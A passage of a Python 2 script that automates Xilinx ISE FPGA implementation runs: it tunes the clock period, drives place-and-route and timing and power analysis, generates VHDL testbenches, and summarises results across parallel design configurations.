clk_period = config.genconf.clk_initial_period
#clock adjustment iterations
inf = 1
log.write("\n\nStarting Implementation")
stat.update('Converged', 'No$wait')
while (inf == 1):
ucf_content = "NET \""+ config.genconf.clk_net +"\" TNM_NET =" + config.genconf.clk_net +"; \nTIMESPEC TS_clock = PERIOD \""+ config.genconf.clk_net +"\" " + str(clk_period) + " ns HIGH 50%;\n" + config.genconf.generic_constraint_content
log.write("\n\n*.ucf content [Phase = %d, Finish_flag = %d]: \n%s" % (iteration, finish, ucf_content))
log.flush()
ucf_file = open(config.genconf.constraint_file,'w')
ucf_file.write(ucf_content)
ucf_file.close()
stat.update('Iteration', str(iteration)+'$ok')
stat.update('Clock', str(clk_period)+'$ok')
#2.1 Translate
stat.update('Progress', 'Translate$wait')
stat.update('Translate', 'In progress$wait')
(status, timetaken) = execute_impl_script(config.get_translate_script(), config.translate_log, retry_attempts, "TRANSLATE", log)
if(status < 0):
stat.update('Translate', 'Error$err')
return(status)
stat.update('Translate', '100%: ' + timetaken + '$ok')
#2.2 MAP
stat.update('Progress', 'MAP$wait')
stat.update('Map', 'In progress$wait')
(status, timetaken) = execute_impl_script(config.get_map_script(), config.map_log, retry_attempts, "MAP", log)
if(status < 0):
stat.update('Map', 'Error$err')
return(status)
stat.update('Map', '100%: ' + timetaken + '$ok')
#2.3 PAR
stat.update('Progress', 'PlaceRoute$wait')
stat.update('PlaceRoute', 'In progress$wait')
(status, timetaken) = execute_impl_script(config.get_par_script(), config.par_log, retry_attempts, "PAR", log)
if(status < 0):
stat.update('PlaceRoute', 'Error$err')
return(status)
stat.update('PlaceRoute', '100%: ' + timetaken + '$ok')
#2.4 ANALYZE TIMING
stat.update('Progress', 'Timing Analysis$wait')
stat.update('TimingAnalysis', 'In progress$wait')
(status, timetaken) = execute_impl_script(config.get_trace_script(), config.trace_report, retry_attempts, "TRACE/Timing Analysis", log)
if(status < 0):
stat.update('TimingAnalysis', 'Error$err')
return(status)
timing_report_file = open(config.trace_report,"r")
timing_report = timing_report_file.read()
timing_report_file.close()
stat.update('TimingAnalysis', '100%: ' + timetaken + '$ok')
if(timing_report.find("All constraints were met") < 0):
if(timing_report.find("not met") < 0):
log.write("\nERROR WHILE ANALYZING TIMING REPORT")
return(-1)
else: #not met: stop decreasing the clock period, but now increase it until met
finish = 1
stat.update('Converged', 'Yes$ok')
clk_period += config.genconf.clk_adjustment_delta
else:
if (finish == 1): #if met after increasing the clock period - minimum period found (stop iterating)
break
else: #if met, but minimun period yet not found
clk_period -= config.genconf.clk_adjustment_delta
iteration +=1
stat.update('Progress', 'Building Netlist$wait')
stat.update('NetlistBuilder', 'In process$wait')
(status, timetaken) = execute_impl_script(config.get_netgen_script('par'), config.par_netlist_log, retry_attempts, "Building Post-PAR Netlist", log)
if(status < 0): return(status)
(status, timetaken) = execute_impl_script(config.get_netgen_script('map'), config.map_netlist_log, retry_attempts, "Building Post-MAP Netlist", log)
if(status < 0): return(status)
stat.update('NetlistBuilder', '100%: ' + timetaken + '$ok')
stat.update('Progress', 'Power Analysis$wait')
stat.update('PowerAnalysis', 'Inprogress$wait')
(status, timetaken) = execute_impl_script(config.get_es_power_script(), config.es_power_report, retry_attempts, "Power Analysis", log)
if(status < 0):
stat.update('PowerAnalysis', 'Error$err')
return(status)
stat.update('PowerAnalysis', '100%: ' + timetaken + '$ok')
stat.update('Progress', 'Completed: ' + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + '$ok')
log.write("\n\n\t\tImplementation Finished")
impl_prop = get_implementation_properties(config.par_log, config.trace_report, config.es_power_report)
stat.update('FREQ', str("%.2f" %impl_prop.maximum_frequency) + '$res')
stat.update('POWER_DYN', str("%.2f" %impl_prop.dynamic_power) + '$res')
stat.update('SLICE', str(impl_prop.slices) + '$res')
stat.update('REG', str(impl_prop.ffs) + '$res')
stat.update('LUT', str(impl_prop.luts) + '$res')
stat.update('DSP', str(impl_prop.dsps) + '$res')
stat.update('RAMB', str(impl_prop.rambs) + '$res')
log.write("\n\n" + impl_prop.to_string())
log.close()
class ImplementationProperties:
def __init__(self):
#value == -1 means that tag was not found in the report file, it should be denoted as ? in the resulting table
self.luts = int(0)
self.ffs = int(0)
self.slices = int(0)
self.rambs = int(0)
self.dsps = int(0)
self.minimum_period = float(0.0)
self.maximum_frequency = float(0.0)
self.dynamic_power = float(0.0)
self.static_power = float(0.0)
def to_string(self):
res = "\t\tImplementation Properties: "
res += "\nLUTs:\t" + str(self.luts)
res += "\nFFs:\t" + str(self.ffs)
res += "\nSlices:\t" + str(self.slices)
res += "\nRAMBs:\t" + str(self.rambs)
res += "\nDSPs:\t" + str(self.dsps)
res += "\nMin Clk Period:\t" + str("%.3f" % self.minimum_period)
res += "\nMax Frequency:\t" + str("%.3f" % self.maximum_frequency)
res += "\nDynamic Power:\t" + str("%.3f" % self.dynamic_power)
res += "\nStatic Power:\t" + str("%.3f" % self.static_power)
return(res)
def get_implementation_properties(par_file, trace_file, power_file):
num_point_pattern = "[0-9]+\.?[0-9]*"
num_comma_pattern = "[0-9]+\,?[0-9]*"
res = ImplementationProperties()
#1. Retrieve Power data from power_file
if(os.path.isfile(power_file)):
with open(power_file, 'r') as f:
content = f.read()
match = re.findall("Supply Power \(mW\).+", content)[0]
power_list = re.findall(num_point_pattern, match)
res.dynamic_power = float(power_list[1])
res.static_power = float(power_list[2])
#2. Retrieve timing data from trace_file
if(os.path.isfile(trace_file)):
with open(trace_file, 'r') as f:
content = f.read()
match = re.findall("Minimum period:.*?\{", content)[0]
res.minimum_period = float(re.findall(num_point_pattern, match)[0])
match = re.findall("\(Maximum frequency:.*?\)", content)[0]
res.maximum_frequency = float(re.findall(num_point_pattern, match)[0])
#3. Retrieve Utilization data from par_file
if(os.path.isfile(par_file)):
with open(par_file, 'r') as f:
content = f.read()
try:
match = re.findall("Number of Slice LUTs:.*?%", content)[0]
res.luts = int(re.findall(num_comma_pattern, match)[0].replace(',',''))
match = re.findall("Number of Slice Registers:.*?%", content)[0]
res.ffs = int(re.findall(num_comma_pattern, match)[0].replace(',',''))
match = re.findall("Number of occupied Slices:.*?%", content)[0]
res.slices = int(re.findall(num_comma_pattern, match)[0].replace(',',''))
match = re.findall("Number of RAMB.*?:(.*?)%", content)
for c in match:
res.rambs += int(re.findall(num_comma_pattern, c)[0].replace(',',''))
match = re.findall("Number of DSP.*?:(.*?)%", content)
for c in match:
res.dsps += int(re.findall(num_comma_pattern, c)[0].replace(',',''))
except IndexError:
print 'File Parse Error (file incomplete): get_implementation_properties: ' + par_file
return(res)
return(res)
def get_report_summary(par_report, trace_report, power_report, factorial_design = None, IncludeDefaultConfig=False):
t = Table("RESULTS")
t.add_column("CONFIGURATION")
t.add_column("CLK_PERIOD")
t.add_column("MAX_FREQUENCY")
t.add_column("POWER_DYNAMIC")
t.add_column("POWER_STATIC")
t.add_column("UTIL_REG")
t.add_column("UTIL_LUT")
t.add_column("UTIL_SLICE")
t.add_column("UTIL_RAMB")
t.add_column("UTIL_DSP")
t.add_column("CONFIG_TABLE_INDEX")
t.add_column("FACTOR_SETTING")
os.chdir(target_dir)
dirlist = []
if factorial_design != None:
indset = range(0, len(factorial_design.configurations), 1) if IncludeDefaultConfig else range(1, len(factorial_design.configurations), 1)
for i in indset:
dirlist.append(factorial_design.configurations[i].label)
else:
for c in sorted(glob.glob(genconf.design_label + "*")):
if(os.path.isdir(c)):
dirlist.append(c)
dirlist.sort()
for i in range(0, len(dirlist), 1):
#print "\n\nSummarizing Report Data, Configuration directory: " + dirlist[i]
os.chdir(os.path.join(target_dir, dirlist[i]))
res = get_implementation_properties(par_report, trace_report, power_report)
#print res.to_string()
t.add_row()
t.put(i, 0, dirlist[i])
t.put(i, 1, str("%.3f" % res.minimum_period))
t.put(i, 2, str("%.3f" % res.maximum_frequency))
t.put(i, 3, str("%.3f" % res.dynamic_power))
t.put(i, 4, str("%.3f" % res.static_power))
t.put(i, 5, str(res.ffs))
t.put(i, 6, str(res.luts))
t.put(i, 7, str(res.slices))
t.put(i, 8, str(res.rambs))
t.put(i, 9, str(res.dsps))
if factorial_design != None:
c = factorial_design.get_by_label(dirlist[i])
t.put(i, 10, str(c.table_index))
t.put(i, 11, str(' '.join(c.factor_setting)))
else:
t.put(i, 10, '')
t.put(i, 11, '')
return(t)
def norm_clk_period(c):
base = int(c)
r = float(c) - float(base)
if(r>0.5):
return(float(base) + 1.0)
elif(r>0):
return(float(base) + 0.5)
else:
return(float(c))
def simulate_estimate_consumption(config, target_dir, retry_attempts, only_update_testbench, stat):
if(not os.path.exists(config.genconf.tool_log_dir)):
os.mkdir(config.genconf.tool_log_dir)
#remove old simulation log (if existed)
if(os.path.exists(os.path.join(config.genconf.tool_log_dir, config.label+".log"))):
with open(os.path.join(config.genconf.tool_log_dir, config.label+".log"), 'r+') as f:
c = f.read()
ind = c.find("Simulating: " + config.label)
if ind > 0:
f.seek(0)
f.write(c[:ind])
f.truncate()
log = open(os.path.join(config.genconf.tool_log_dir, config.label+".log"), 'a')
log.write("\n\t\tSimulating: " + config.label+"\n")
if not os.path.exists(os.path.join(target_dir, config.label)):
log.write('\nNo implementation found, nothing to simulate, exiting')
return
os.chdir(os.path.join(target_dir, config.label))
with open(config.trace_report, 'r') as f:
content = f.read()
match = re.findall("Minimum period:.*?\{", content)[0]
minimum_period = float(re.findall("[0-9]+\.?[0-9]*", match)[0])
period = norm_clk_period(minimum_period)
scale_factor = period / config.genconf.std_clock_period
#1. Modify Testbench: clock period constant
with open(config.genconf.testbench_file, 'r') as f:
content = f.read()
content = re.sub(config.genconf.clk_constant + ".*:=\s*[0-9]+\.?[0-9]*\s*?", config.genconf.clk_constant + " : real := " + str("%.1f" % period), content)
with open(config.genconf.testbench_file, 'w') as f:
f.write(content)
print('Testbench Updated: ' + config.label)
if(only_update_testbench):
return
#2. Create/Modify sim_project_file
content = ""
if(config.genconf.sim_project_file != ""):
f = open(config.genconf.sim_project_file, 'r')
content = f.read()
f.close()
sim_prj_file = "par_sim.prj"
netlist_files = glob.glob(config.genconf.netlist_dir + "/par/" + "*.vhd")
# netlist_files = glob.glob(config.genconf.netlist_dir + "/par/" + "*.v")
for c in netlist_files:
content = "vhdl work \"" + c + "\"\n" + content
# content = "verilog work \"" + c + "\"\n" + content
content += "vhdl work \"" + config.genconf.testbench_file + "\"\n"
# content += "verilog work \"" + config.genconf.testbench_file + "\"\n"
f = open(sim_prj_file, 'w')
f.write(content)
f.close()
#3. Check netlist for invalid identifiers, rename them
rx_ptn = re.compile(r"\\.*\)\\")
repl_ptn = re.compile("[a-zA-Z0-9_]+")
for c in netlist_files:
ndesc = open(c,'r')
ncontent = ndesc.read()
ndesc.close()
sdf = c.replace(".vhd", ".sdf")
# sdf = c.replace(".v", ".sdf")
if(os.path.exists(sdf)):
sdf_desc = open(sdf,'r')
sdf_content = sdf_desc.read()
sdf_desc.close()
nlines = ncontent.split('\n')
log.write("Netlist file " + c + ", lines: " + str(len(nlines)))
ident_list = set()
for l in nlines:
match = re.findall(rx_ptn, l)
if(len(match)>0):
ident_list.add(match[0])
cnt = 0
for ident in ident_list:
tx = re.findall(repl_ptn, ident)
if(len(tx) > 0):
repl_id = tx[0] + "_FixSyntax_" + str(cnt)
else:
repl_id = "Identifier_FixSyntax_" + str(cnt)
ncontent = ncontent.replace(ident, repl_id)
x = ident.replace("\\","",1).replace(")\\","\\)")
sdf_content = sdf_content.replace(x, repl_id)
log.write("\n\t\tFixed Identifier Syntax: " + ident + " -> " + repl_id + " [" + x + "] -> " + repl_id)
cnt += 1
if(cnt > 0):
log.write("\n\t\tREWRITING NETLIST: " + c)
ndesc = open(c,'w')
ncontent = ndesc.write(ncontent)
ndesc.close()
if(os.path.exists(sdf)):
log.write("\n\t\tREWRITING SDF: " + sdf)
sdf_desc = open(sdf,'w')
sdf_desc.write(sdf_content)
sdf_desc.close()
#4. Compile: fuse... [subprocess]
stat.update('Progress', 'Fuse Compile$wait')
stat.update('Fuse_Compile', 'In progress$wait')
print "Fuse Compiling: " + config.label
sim_exec = "testbench_isim_par.exe"
fuse_script = "fuse -intstyle ise -mt off -incremental -lib simprims_ver -lib unisims_ver -lib unimacro_ver -lib xilinxcorelib_ver -lib secureip -o ./" + sim_exec + " -prj ./" + sim_prj_file + " work." + config.genconf.testbench_top_unit + " > " + config.fuse_log
# fuse_script = "fuse -intstyle ise -mt off -incremental -lib simprims_ver -lib unisims_ver -lib unimacro_ver -lib xilinxcorelib_ver -lib secureip -o ./" + sim_exec + " -prj ./" + sim_prj_file + " work." + config.genconf.testbench_top_unit + " work.glbl > " + config.fuse_log
(status, timetaken) = execute_impl_script(fuse_script, config.fuse_log , retry_attempts, "FUSE compile", log, sim_exec)
if(status < 0):
stat.update('Fuse_Compile', 'Error$err')
return(status)
stat.update('Fuse_Compile', '100%: ' + timetaken + '$ok')
#5. Create *.cmd file
saif_file = "xpower_isim.saif"
cmd_content = "sdfanno -min " + config.genconf.netlist_dir + "/par/_timesim.sdf" + " -root /" + config.genconf.testbench_top_unit + "/" + config.genconf.uut_root
cmd_content += "\nonerror {resume}"
cmd_content += "\nrun 0 ns"
cmd_content += "\nrestart"
cmd_content += "\nrun " + str(int(scale_factor * config.genconf.std_start_time)) + " ns"
cmd_content += "\nsaif open -scope /" + config.genconf.testbench_top_unit + "/" + config.genconf.uut_root + " -file " + saif_file + " -allnets"
cmd_content += "\nrun " + str(int(scale_factor * config.genconf.std_observation_time)) + " ns"
cmd_content += "\nsaif close;\nexit\n"
batch_file = "isim_workload.cmd"
with open(batch_file, "w") as f:
f.write(cmd_content)
#6. Simulate *.exe... *.cmd... [subprocess]
stat.update('Progress', 'Simulation$wait')
stat.update('Simulation_ISIM', 'In progress$wait')
if platform == 'win32' or platform == 'win64':
isim_script = os.path.join(config.genconf.ise_path, 'settings64.bat') + ' && ' + sim_exec + " -intstyle " + config.genconf.intstyle
else:
isim_script = "./"+sim_exec+" -intstyle " + config.genconf.intstyle
if(config.genconf.isim_gui == "on"):
isim_script += " -gui"
if(config.genconf.waveform_file != ""):
isim_script += " -view " + config.genconf.waveform_file
isim_script += " -tclbatch ./" + batch_file
isim_script += " -wdb ./testbench_isim_par.wdb"
isim_script += " > " + config.isim_log
(status, timetaken) = execute_impl_script(isim_script, config.isim_log, retry_attempts, "Simulation swithing activity", log, saif_file)
if(status < 0):
stat.update('Simulation_ISIM', 'Error$err')
return(status)
stat.update('Simulation_ISIM', '100%: ' + timetaken + '$ok')
#7. Xpower [subprocess]
stat.update('Progress', 'Power Analysis$wait')
stat.update('PowerAnalysis', 'In progress$wait')
#config.saif_power_report = config.genconf.log_dir + "/SAIF_" + config.genconf.top_design_unit + ".pwr"
xpower_script = "xpwr -v -intstyle " + config.genconf.intstyle + " -ol std " + config.genconf.top_design_unit + ".ncd " + config.genconf.top_design_unit + ".pcf" + " -s " + saif_file +" -o " + config.saif_power_report
xpower_script += " > " + config.genconf.log_dir + "/xpower_log.log"
(status, timetaken) = execute_impl_script(xpower_script, config.saif_power_report, retry_attempts, "Xpower Power Estimation (+ SAIF)", log)
if(os.path.exists(os.path.join(target_dir, config.label, './isim'))):
print config.label + ' cleanup: Removing isim folder'
shutil.rmtree(os.path.join(target_dir, config.label, './isim'))
if(status < 0):
stat.update('PowerAnalysis', 'Error$err')
return(status)
stat.update('PowerAnalysis', '100%: ' + timetaken + '$ok')
stat.update('Progress', 'Completed: ' + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + '$ok')
impl_prop = get_implementation_properties(config.par_log, config.trace_report, config.saif_power_report)
stat.update('FREQ', str("%.2f" %impl_prop.maximum_frequency) + '$res')
stat.update('POWER_DYN', str("%.2f" %impl_prop.dynamic_power) + '$res')
stat.update('SLICE', str(impl_prop.slices) + '$res')
stat.update('REG', str(impl_prop.ffs) + '$res')
stat.update('LUT', str(impl_prop.luts) + '$res')
stat.update('DSP', str(impl_prop.dsps) + '$res')
stat.update('RAMB', str(impl_prop.rambs) + '$res')
log.write("\n\n" + impl_prop.to_string())
log.close()
#----------------------------------------------
class SignalDim:
def __init__(self, LeftD=int(0), RightD=int(0), Dir='downto'):
self.LeftD=LeftD
self.RightD=RightD
self.Dir=Dir
def to_string(self):
return(str(self.LeftD) + " " + self.Dir + " " + str(self.RightD))
def get_width(self):
return(abs(int(self.LeftD)-int(self.RightD) + 1))
def get_max(self):
if(int(self.LeftD) > int(self.RightD)):
return(int(self.LeftD))
else:
return(int(self.RightD))
def get_min(self):
if(int(self.LeftD) < int(self.RightD)):
return(int(self.LeftD))
else:
return(int(self.RightD))
class PortT:
def __init__(self, name='', direction='', basetype=''):
self.name=name
self.wire=None
self.direction=direction
self.basetype=basetype
self.dimensions=[]
self.used = 0
def to_string(self):
line = self.name + " " + self.direction + " " + self.basetype
#line = line + "dim: " + str(len(self.dimensions))
if len(self.dimensions) > 0:
line += " ("
for d in self.dimensions:
if d != self.dimensions[-1]:
line = line + d.to_string() + ", "
else:
line = line + d.to_string() + ")"
return (line)
def get_wire_definition(self, prefix = "tb_"):
self.wire = prefix+self.name
res = 'signal ' + self.wire + ' : ' + self.basetype
if len(self.dimensions) > 0:
res += " ("
for d in self.dimensions:
if d != self.dimensions[-1]:
res += d.to_string() + ", "
else:
res += d.to_string() + ")"
return(res)
def get_width(self):
res = int(1)
for dim in self.dimensions:
res = res*dim.get_width()
return(res)
class EntityT:
def __init__(self, name='none', file_content = ''):
self.name = name
self.file_content=file_content
self.arch_name=''
self.port_list_def=[]
self.entity_definition=''
self.port_list=[]
self.architecture=''
self.body=''
self.port_map=[]
self.expressions=[]
def get_port_by_name(self, portname, match_case = "off"):
for p in self.port_list:
if(match_case == "off"):
if(p.name.lower() == portname.lower()):
return(p)
else:
if(p.name == portname):
return(p)
return(None)
def build_testbench(config, target_dir, testbench_template_content):
result = testbench_template_content
pure_port_name = "[a-zA-Z0-9_.]+"
port_par_pattern = re.compile(pure_port_name)
port_def_pattern = re.compile(pure_port_name+'.+?;')
dimensions_def_pattern=re.compile("\(.+?\)")
number_pattern = re.compile("[0-9]+")
word_pattern = re.compile("[a-zA-Z]+")
os.chdir(os.path.join(target_dir, config.label))
print("\n Target dir: " + os.getcwd())
netlist_files = glob.glob(config.genconf.netlist_dir + "/par/" + "*.vhd")
ent = None
for ntf in netlist_files:
f = open(ntf)
content = f.read()
f.close()
match = re.findall("entity\s+"+ config.genconf.top_design_unit +"\s+is",content,re.DOTALL)
if(len(match)>0):
ent = EntityT(config.genconf.top_design_unit, content)
break
match = re.findall('entity\s+'+ent.name+'\s+is.+?end\s'+ent.name,content,re.DOTALL)
ent.entity_definition = match[0]
t = re.sub('\s*\)\s*;\s*end', ';\nend', ent.entity_definition)
ent.port_list_def = port_def_pattern.findall(t)
#parse port list -> list of PortT objects
for p in ent.port_list_def:
t = port_par_pattern.findall(p)
port = PortT(t[0],t[1],t[2])
dim = dimensions_def_pattern.findall(p)
if len(dim) > 0:
m=dim[0].split(',')
for x in m:
nm = number_pattern.findall(x)
wd = word_pattern.findall(x)
sdim = SignalDim(nm[0], nm[1], wd[0])
port.dimensions.append(sdim)
ent.port_list.append(port)
#Signal definitions to use in port map
sdef = ""
for p in ent.port_list:
sdef += "\n\t" + p.get_wire_definition()
assignment = ''
if(p.direction =="in" and len(p.dimensions) == 0):
assignment = " := \'0\'"
if(p.name.lower() == config.genconf.rst_net.lower()):
assignment = " := \'1\'"
sdef += assignment + ";"
result = result.replace('--#Signals', sdef)
#UUT Instance port map
uut_map = config.genconf.uut_root + " : entity work." + config.genconf.top_design_unit + " port map ("
for i in range(0, len(ent.port_list), 1):
uut_map += "\n\t" + ent.port_list[i].name + "\t=>\t" + ent.port_list[i].wire
if(i != len(ent.port_list)-1):
uut_map += ","
uut_map +="\n\t);"
result = result.replace('--#Instance', uut_map)
#Clock
clock_port = ent.get_port_by_name(config.genconf.clk_net)
if(clock_port == None):
print "clock signal [" + config.genconf.clk_net +"] not found in the netlist code"
else:
clk_proc = "\t\twait for 1 ns * " + config.genconf.clk_constant + "/2;\n\t\t" + clock_port.wire + " <= not " + clock_port.wire + ";"
result = result.replace('--#Clock', clk_proc)
#Reset
reset_port = ent.get_port_by_name(config.genconf.rst_net)
if(reset_port == None):
print "Reset signal [" + config.genconf.rst_net +"] not found in the netlist code"
else:
rst_proc = "\t\twait for 10*" + config.genconf.clk_constant + ";\n\t\t" + reset_port.wire + " <= \'0\';"
result = result.replace('--#Reset', rst_proc)
#Random_vector
inputs = []
in_wid = 0
for p in ent.port_list:
if(p.direction == "in" and p.name.lower() != config.genconf.clk_net.lower() and p.name.lower() != config.genconf.rst_net.lower()):
inputs.append(p)
in_wid += p.get_width()
if(in_wid < 16): in_wid = 16;
vect = 'rand_input_vect'
vect_def = "\t\tconstant RWID : integer := " +str(in_wid) + ";"
vect_def += "\n\t\tvariable " + vect + " : std_logic_vector(RWID-1 downto 0);"
result = result.replace('--#Random_vector', vect_def)
#Process
v_i = in_wid-1
proc = "\t\t\tset_random_value(" + vect + ");"
for p in inputs:
if len(p.dimensions) > 0:
dmin = p.dimensions[0].get_min()
dmax = p.dimensions[0].get_max()
for i in range(dmax, dmin-1, -1):
proc += "\n\t\t\t" + p.wire + "(" + str(i) + ")" + " <= " + vect + "(" + str(v_i) + ");"
v_i -=1
else:
proc += "\n\t\t\t" + p.wire + " <= " + vect + "(" + str(v_i) + ");"
v_i -= 1
proc+="\n\t\t\twait until rising_edge(" + clock_port.wire + ");"
result = result.replace('--#Process', proc)
print(result)
f = open(config.genconf.testbench_file,'w')
f.write(result)
f.close()
def get_active_proc_number(proclist):
res = 0
for p in proclist:
if p[0] != None:
if(p[0].is_alive()):
res += 1
return(res)
def proclist_stat(proclist):
active_proc = 0
finished_proc = 0
for p in proclist:
if p[0] != None:
if(p[0].is_alive()):
active_proc += 1
else:
finished_proc += 1
return(active_proc, finished_proc)
class ProcStatus(object):
def __init__(self, tag = 'Noname'):
self.data = dict()
self.tag = tag
self.changed = True
def copy(self, src):
for key, value in list(src.data.items()):
self.data[key] = value
self.tag = src.tag
self.changed = src.changed
def update(self, key, val):
self.data[key] = val
self.changed = True
def set_mark(self, inmark):
self.changed = inmark
def get_mark(self):
return(self.changed)
def clear(self, keylist, initval='-'):
for key in keylist:
self.data[key] = initval
self.changed = True
def to_str(self):
res = ""
for key, value in list(self.data.items()):
res += str(key) + ' : ' + str(value) + ', '
return(res)
def to_xml(self):
res = '<' + self.tag + ' '
for key, value in list(self.data.items()):
res += '\n\t' +str(key) + ' = \"' + str(value) + '\" '
res += ' >'
res += '\n</' + self.tag + '>'
return(res)
def from_xml(self, xmlroot, tag, key, val):
for i in xmlroot.findall(tag):
if i.get(key, '') == val:
for aname, avalue in i.attrib.items():
self.data[aname] = avalue
self.tag = tag
break
def save_statistics(statlist, statfile):
res = '<?xml version=\"1.0\"?>\n<data>'
for i in statlist:
res += '\n\n' + i.to_xml()
res += '\n</data>'
with open(statfile, 'w') as f:
f.write(res)
#minimized stat file - export only changed items
res = '<?xml version=\"1.0\"?>\n<data>'
for i in statlist:
if i.get_mark():
res += '\n\n' + i.to_xml()
i.set_mark(False)
res += '\n</data>'
with open(statfile.replace('.xml','_min.xml'), 'w') as f:
f.write(res)
#returns dictionary dict[config_label] = (process_id=None, config_descriptor, statistic_descriptor)
#read from file statfile (xml)
def recover_statistics(config_list, statfile, clear = False):
procdict = dict()
recover_stat_tree = None
if (not clear) and os.path.exists(statfile):
recover_stat_tree = ET.parse(statfile).getroot()
for i in config_list:
stat = ProcStatus('Config')
if(recover_stat_tree is not None): stat.from_xml(recover_stat_tree, 'Config', 'Label', i.label)
procdict[i.label] = (None, i, stat)
stat.update('Label', i.label)
return(procdict)
def copy_all_files(src, dst):
src_files = os.listdir(src)
for file_name in src_files:
full_file_name = os.path.join(src, file_name)
if (os.path.isfile(full_file_name)):
shutil.copy(full_file_name, dst)
#Entry point for the parent process
if __name__ == '__main__':
call_dir = os.getcwd()
config_file_path = os.path.join(os.getcwd(), sys.argv[1])
print "CONFIG PATH: " + config_file_path
#1. Parse configuration file
iconfig = sys.argv[1]
tree = ET.parse(iconfig).getroot()
tasktag = tree.findall('task')[0]
maxproc = int(tasktag.get('max_proc'))
retry_attempts = int(tasktag.get('retry_attempts','0'))
overwrite_flag = True if tasktag.get('overwrite_existing','') == 'on' else False
implement_design = tasktag.get('implement_design','on')
implement_default_config = True if tasktag.get('implement_default_config', 'on') == 'on' else False
simulate_switching_activity = tasktag.get('simulate_switching_activity','on')
only_update_testbench = tasktag.get('only_update_testbench','off')
build_testbench_random_inputs = tasktag.get('build_testbench_random_inputs','off')
first_index = tasktag.get('first_index','')
last_index = tasktag.get('last_index','')
print "Max Proc: " + str(maxproc)
configurator = IoptionConfigurator()
factorial_design = configurator.create_design(tree)
genconf = configurator.genconf
target_dir = os.path.join(call_dir, genconf.design_dir)
globalstatdict = dict()
stat = ProcStatus('Global')
stat.update('Phase', 'Implementation')
if implement_design == 'on':
stat.update('Progress', '0%')
stat.update('Report', 'wait')
else:
stat.update('Progress', 'Not selected')
stat.update('Report', '@[CSV@?./Logs/summary_power_estimated.csv]@, @[XML@?./Logs/summary_power_estimated.xml]@')
globalstatdict['Implementation'] = stat
stat = ProcStatus('Global')
stat.update('Phase', 'Power Simulation')
if simulate_switching_activity == "on":
stat.update('Progress', '0%')
stat.update('Report', 'wait')
else:
stat.update('Progress', 'Not selected')
stat.update('Report', '@[CSV@?./Logs/summary_power_simulated.csv]@, @[XML@?./Logs/summary_power_simulated.xml]@')
globalstatdict['Simulation'] = stat
BaseManager.register('ProcStatus', ProcStatus)
manager = BaseManager()
manager.start()
#allocate User Interface and launch it - statistics page (web)
copy_all_files(os.path.join(call_dir,'interface'), genconf.design_dir)
try:
if platform == 'linux' or platform == 'linux2':
subprocess.check_output('xdg-open ' + os.path.join(call_dir, genconf.design_dir, 'index.html > ./dummylog.txt'), shell=True)
elif platform == 'cygwin':
subprocess.check_output('cygstart ' + os.path.join(call_dir, genconf.design_dir, 'index.html > ./dummylog.txt'), shell=True)
elif platform == 'win32' or platform == 'win64':
subprocess.check_output('start ' + os.path.join(call_dir, genconf.design_dir, 'index.html > ./dummylog.txt'), shell=True)
except subprocess.CalledProcessError as e:
print e.output
#Determine range of configurations to work with
if implement_default_config:
ind_start = 0
elif first_index != '':
ind_start = int(first_index)
else:
ind_start = 1
ind_end = int(last_index)+1 if last_index != '' else len(factorial_design.configurations)
#Implement selected configurations
procdict = recover_statistics(factorial_design.configurations, genconf.statfile, True)
clk_adjusted_flag = False
if implement_design == "on":
timestart = datetime.datetime.now().replace(microsecond=0)
for i in range(ind_start, ind_end, 1):
procdict[factorial_design.configurations[i].label][2].update('Progress', 'Scheduled')
procdict[factorial_design.configurations[i].label][2].clear(['Iteration', 'Clock', 'Converged', 'Synthesis', 'Translate', 'Map', 'PlaceRoute', 'TimingAnalysis', 'NetlistBuilder', 'PowerAnalysis'])
for i in range(ind_start, ind_end, 1):
stat = manager.ProcStatus('Config') #shared proxy-object for process status monitoring
stat.update('Label', factorial_design.configurations[i].label)
#wait for resources for new process and update statistics
while True:
(active_proc_num, finished_proc_num) = proclist_stat(list(procdict.values()))
globalstatdict['Implementation'].update('Progress', str('%.2f' % (100*float(finished_proc_num)/float(ind_end-ind_start)))+'%')
save_statistics([val for key, val in sorted(globalstatdict.items())] + [item[2] for item in [val for key, val in sorted(procdict.items())]] , genconf.statfile)
if active_proc_num < maxproc:
break
time.sleep(5)
globalstatdict['Implementation'].update('Time_Taken', str(datetime.datetime.now().replace(microsecond=0) - timestart)+'$ok')
# adjust initial clock period for future processes
if not clk_adjusted_flag: #do it just once
buf_clk = float(0)
buf_cnt = int(0)
for x in list(procdict.values()):
if x[0] != None: #if process has been launched
if x[0].exitcode != None: #and terminated, then we can retrieve the resulted clock period
if os.path.exists(os.path.join(target_dir, x[1].label, x[1].trace_report )):
with open(os.path.join(target_dir, x[1].label, x[1].trace_report), 'r') as f:
content = f.read()
buf_clk += float(re.findall("Minimum period:\s*([0-9]+\.?[0-9]*)", content)[0])
buf_cnt += 1
if buf_cnt > 0: #compute the mean clock period
genconf.clk_initial_period = norm_clk_period(buf_clk/float(buf_cnt))
print "CLK INITIAL PERIOD ADJUSTED: " + str(genconf.clk_initial_period)
if(buf_cnt > (ind_end - ind_start)/5): clk_adjusted_flag = True
p = Process(target = implement_configuration, args = (factorial_design.configurations[i], target_dir, retry_attempts, overwrite_flag, stat))
p.start()
procdict[factorial_design.configurations[i].label] = (p, factorial_design.configurations[i], stat)
#wait for completion and update statistics
while True:
(active_proc_num, finished_proc_num) = proclist_stat(list(procdict.values()))
globalstatdict['Implementation'].update('Progress', str('%.2f'% (100*float(finished_proc_num)/float(ind_end-ind_start)))+'%')
save_statistics([val for key, val in sorted(globalstatdict.items())] + [item[2] for item in [val for key, val in sorted(procdict.items())]] , genconf.statfile)
if active_proc_num < 1:
break
time.sleep(5)
globalstatdict['Implementation'].update('Time_Taken', str(datetime.datetime.now().replace(microsecond=0) - timestart)+'$ok')
if(not os.path.exists(genconf.tool_log_dir)):
os.mkdir(config.genconf.tool_log_dir)
summary = get_report_summary(genconf.log_dir + "/_par.log", factorial_design.configurations[0].trace_report, factorial_design.configurations[0].es_power_report, factorial_design, implement_default_config)
with open(os.path.join(genconf.tool_log_dir, "summary_power_estimated.csv"), 'w') as summary_file:
summary_file.write(summary.to_csv())
with open(os.path.join(genconf.tool_log_dir, "summary_power_estimated.xml"), 'w') as summary_file:
summary_file.write(summary.to_xml('Configuration'))
globalstatdict['Implementation'].update('Report', '@[CSV@?./Logs/summary_power_estimated.csv]@, @[XML@?./Logs/summary_power_estimated.xml]@$ok')
